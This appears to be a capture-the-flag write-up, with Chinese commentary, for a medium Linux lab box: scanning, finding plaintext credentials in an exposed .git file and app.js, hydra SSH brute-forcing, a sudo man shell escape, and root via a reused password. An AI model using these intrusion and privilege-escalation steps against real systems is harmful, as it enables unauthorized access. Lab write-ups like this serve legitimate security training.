Box Info #
| OS | Difficulty |
|---|---|
| Linux | Medium |
Nmap #
[root@kali] /home/kali/ofuskeit
❯ nmap 172.17.0.2 -sV -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 f4:1e:4f:80:e4:25:19:87:a5:2b:e5:fe:b3:16:5d:70 (ECDSA)
|_ 256 7d:5a:d8:80:54:05:d2:2f:6f:7f:59:26:4f:6f:83:a8 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Servicios de Mantenimiento Inform\xC3\xA1tico
3000/tcp open http Node.js Express framework
|_http-title: Error
Dirsearch #
[root@kali] /home/kali/ofuskeit
❯ dirsearch -u http://172.17.0.2
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://172.17.0.2/
[22:47:24] Scanning:
[22:47:24] 200 - 318B - /.git
[22:47:31] 200 - 2KB - /index.html
[22:47:31] 301 - 313B - /javascript -> http://172.17.0.2/javascript/
[22:47:33] 301 - 315B - /node_modules -> http://172.17.0.2/node_modules/
[22:47:33] 200 - 14KB - /node_modules/
[22:47:33] 200 - 26KB - /package-lock.json
[22:47:33] 200 - 265B - /package.json
[22:47:34] 403 - 275B - /server-status
[22:47:34] 403 - 275B - /server-status/
Task Completed
查看.git目录,得到一个用户的信息
[root@kali] /home/kali/ofuskeit
❯ curl http://172.17.0.2/.git ⏎
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/empresa/mi-app-segura.git
fetch = +refs/heads/*:refs/remotes/origin/*
[user]
name = balulito
email = admin@empresa.com
password = 'this is top secret'
Feroxbuster #
[root@kali] /home/kali/ofuskeit
❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://172.17.0.2/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [js]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 153l 268w 2270c http://172.17.0.2/style.css
200 GET 1l 18w 1916c http://172.17.0.2/script.js
200 GET 66l 170w 2129c http://172.17.0.2/
301 GET 9l 28w 313c http://172.17.0.2/javascript => http://172.17.0.2/javascript/
200 GET 21l 58w 494c http://172.17.0.2/api.js
301 GET 9l 28w 320c http://172.17.0.2/javascript/events => http://172.17.0.2/javascript/events/
200 GET 497l 1777w 14890c http://172.17.0.2/javascript/events/events
200 GET 497l 1777w 14890c http://172.17.0.2/javascript/events/events.js
301 GET 9l 28w 318c http://172.17.0.2/javascript/util => http://172.17.0.2/javascript/util/
301 GET 9l 28w 326c http://172.17.0.2/javascript/util/support => http://172.17.0.2/javascript/util/support/
200 GET 3l 10w 76c http://172.17.0.2/javascript/util/support/isBuffer
200 GET 715l 2462w 19697c http://172.17.0.2/javascript/util/util
200 GET 715l 2462w 19697c http://172.17.0.2/javascript/util/util.js
200 GET 334l 812w 8672c http://172.17.0.2/javascript/util/support/types
301 GET 9l 28w 319c http://172.17.0.2/javascript/async => http://172.17.0.2/javascript/async/
200 GET 1058l 3007w 32659c http://172.17.0.2/javascript/async/async
200 GET 1058l 3007w 32659c http://172.17.0.2/javascript/async/async.js
[####################] - 87s 1323296/1323296 0s found:17 errors:469615
[####################] - 45s 220546/220546 4910/s http://172.17.0.2/
[####################] - 76s 220546/220546 2917/s http://172.17.0.2/javascript/
[####################] - 72s 220546/220546 3043/s http://172.17.0.2/javascript/events/
[####################] - 74s 220546/220546 2984/s http://172.17.0.2/javascript/util/
[####################] - 74s 220546/220546 2964/s http://172.17.0.2/javascript/util/support/
[####################] - 47s 220546/220546 4711/s http://172.17.0.2/javascript/async/
能直接访问app.js
const express = require('express');
const app = express();
const PORT = 3000;
const tokenValido = "EKL56L4K57657JÑ456J74K5Ñ6754";
app.use(express.json());
app.post('/api', (req, res) => {
const { token } = req.body;
if (token === tokenValido) {
return res.send("✅ Acceso concedido. Contraseña chocolate123");
} else {
return res.status(401).send("❌ Token inválido.");
}
});
app.listen(PORT, () => {
console.log(`🚀 API activa en http://localhost:${PORT}`);
});
得到一个密码:chocolate123
可以利用之前git目录下得到的用户名admin,也可以进行爆破尝试
[root@kali] /home/kali/ofuskeit
❯ hydra -L /usr/share/seclists/Usernames/Names/names.txt -p chocolate123 ssh://172.17.0.2 -I -V
[22][ssh] host: 172.17.0.2 login: admin password: chocolate123
Own balulito #
查看sudo
admin@d62eae51981f:~$ sudo -l
Matching Defaults entries for admin on d62eae51981f:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User admin may run the following commands on d62eae51981f:
(balulito) NOPASSWD: /usr/bin/man
admin@d62eae51981f:~$ sudo -u balulito /usr/bin/man /usr/bin/man
<skip>
!/bin/bash
balulito@d62eae51981f:/home/admin$
Root #
实际上root也是弱密码:chocolate123
balulito@d62eae51981f:~$ su root
Password:
root@d62eae51981f:/home/balulito# id
uid=0(root) gid=0(root) groups=0(root)